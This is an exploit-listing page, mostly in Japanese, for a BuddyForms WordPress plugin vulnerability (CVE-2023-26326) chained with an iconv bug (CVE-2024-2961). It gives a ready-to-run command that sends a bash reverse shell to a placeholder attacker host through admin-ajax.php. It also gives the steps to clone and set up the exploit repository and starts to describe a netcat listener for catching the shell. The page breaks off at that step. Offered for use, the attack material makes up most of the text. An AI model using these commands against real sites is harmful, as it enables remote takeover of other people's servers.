Sploitus

CVE-2023-26326_Buddyform_exploit

kitploit · 2026-08-25

Exploit Code

MARKDOWN24 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MESUDMAMMAD1-CVE-2023-26326_BUDDYFORM_EXPLOIT
`python exploit.py "<TARGET_URL>/wp-admin/admin-ajax.php" 'bash -c "bash -i >& /dev/tcp/<ATTACKER_IP>/<ATTACKER_PORT> 0>&1"'`

もともと、CVE-2023–26326 を悪用するには、デシリアライゼーションの脆弱性としてガジェットチェーンが必要でした。この手法は PHP 8+ で動作する新しい WordPress サイトではもはや使用できません。しかし、CVE-2024-2961](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1) と組み合わせることで、`phar://` の代わりに `php://filter` を通じてエクスプロイトが可能になります。

このエクスプロイトは、cnext-exploit.py スクリプトを改造して作成されました。CVE-2023-26326 に必要な変更を加えており、詳細は 変更内容 に記載されています。

## 使い方

  1. リポジトリをクローンし、仮想環境をセットアップします:



root@kitploit:~
    
    
    git clone https://github.com/omarelshopky/exploit_cve-2023-26326_using_cve-2024-2961.git
    cd exploit_cve-2023–26326_using_cve-2024-2961
    python3 -m venv venv
    source venv/bin/activate
    pip install -r requirements.txt
    

  2. 別のターミナルで、リバースシェルを受け取るためにポート `<ATTACKER_PORT>` で netcat リスナーを起動します: